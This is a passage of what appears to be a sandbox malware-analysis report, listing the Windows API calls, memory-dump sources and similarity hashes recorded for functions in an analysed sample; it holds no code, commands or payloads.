                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2782032738-0
                                                                                                                                        • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                                                        • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                                                                                        • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                                                        • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                                                                                        APIs
                                                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                                                                        • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                                                                        • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1352109105-0
                                                                                                                                        • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                                        • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                                                                        • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                                        • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                                                                        APIs
                                                                                                                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                                                                        • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                                                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3321077145-0
                                                                                                                                        • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                                        • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                                                                        • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                                        • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                                                                                        APIs
                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                                                                                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                                                                                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                        • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                                        • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                                                                                        • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                                        • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                                                                                        APIs
                                                                                                                                        • GetParent.USER32(?), ref: 004503C8
                                                                                                                                        • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                                                                        • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                                                                        • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Proc$Parent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2351499541-0
                                                                                                                                        • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                                        • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                                                                        • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                                        • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                                                                                        APIs
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                                                                                        • TranslateMessage.USER32(?), ref: 00442B01
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$Peek$DispatchTranslate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1795658109-0
                                                                                                                                        • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                                        • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                                                                                        • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                                        • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                                                                                        APIs
                                                                                                                                        • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                                                                                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                                        • GetCaretPos.USER32(?), ref: 004743B2
                                                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                                                                        • GetForegroundWindow.USER32 ref: 004743EE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2759813231-0
                                                                                                                                        • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                                        • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                                                                        • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                                        • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                                        • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                                                                                        • _wcslen.LIBCMT ref: 00449519
                                                                                                                                        • _wcslen.LIBCMT ref: 00449526
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend_wcslen$_wcspbrk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2886238975-0
                                                                                                                                        • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                                                        • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                                                                                        • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                                                        • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __setmode$DebugOutputString_fprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1792727568-0
                                                                                                                                        • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                                                        • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                                                                                        • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                                                        • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2169480361-0
                                                                                                                                        • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                                        • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                                                                        • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                                        • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                                                                          • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                                                                          • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                                                                                        • String ID: cdecl
                                                                                                                                        • API String ID: 3850814276-3896280584
                                                                                                                                        • Opcode ID: 5248fcd12fa573e8471e03ef3ffe1589e610c1ecd3e4c73a3bae80ffd9d943a4
                                                                                                                                        • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                                                                        • Opcode Fuzzy Hash: 5248fcd12fa573e8471e03ef3ffe1589e610c1ecd3e4c73a3bae80ffd9d943a4
                                                                                                                                        • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                                        • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                                                                                        • _memmove.LIBCMT ref: 0046D475
                                                                                                                                        • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2502553879-0
                                                                                                                                        • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                                                        • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                                                                                        • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                                                        • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32 ref: 00448C69
                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                                                                                        • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                                                                                        • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$LongWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 312131281-0
                                                                                                                                        • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                                        • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                                                                                        • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                                        • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                                                                                        APIs
                                                                                                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
